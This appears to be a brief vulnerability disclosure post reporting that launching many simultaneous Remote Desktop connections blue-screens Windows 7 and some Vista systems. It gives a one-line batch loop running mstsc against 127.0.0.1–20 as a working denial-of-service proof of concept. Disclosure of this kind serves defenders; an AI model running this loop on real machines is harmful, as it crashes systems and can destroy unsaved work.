|
Creating multiple RDP connection at the same time causes Windows to
Blue Screen. Here is the Proof of Concept code.
for /L %i in (1,1,20) do mstsc /v:127.0.0.%i
It does work on Windows 7 and some Vista installations.
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 -Tim Medin